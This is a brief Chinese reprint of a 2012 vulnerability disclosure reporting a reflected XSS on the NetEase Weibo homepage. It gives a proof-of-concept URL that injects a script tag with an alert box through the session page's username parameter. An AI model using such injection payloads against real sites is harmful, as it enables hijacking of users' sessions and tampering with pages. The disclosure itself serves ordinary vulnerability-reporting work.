网易微博首页反射型XSS

2012-4-28 23:07:00 来源:网络转载 浏览:106
网易微博最新漏洞公布:首页反射型XSS.

简要描述:悲剧呀~~这是老洞了,换个方式又来了。。
详细说明:http://t.163.com/session?username=%22%3E%3Cscript%3Ealert(%22%E8%80%81%E6%B4%9E%E8%BF%98%E6%B2%A1%E8%A1%A5%22)%3C/script%3E
漏洞证明:

网易微博首页xss

修复方案:有态度的微博,神马态度~

(0)
(0)